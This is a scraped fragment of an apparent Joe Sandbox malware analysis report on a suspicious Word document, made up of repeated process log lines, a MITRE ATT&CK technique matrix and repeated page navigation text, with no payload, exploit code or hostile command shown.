Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
_________03M4138.docx.bin.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report _________03M4138.docx.bin.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
_________03M4138.docx.bin.doc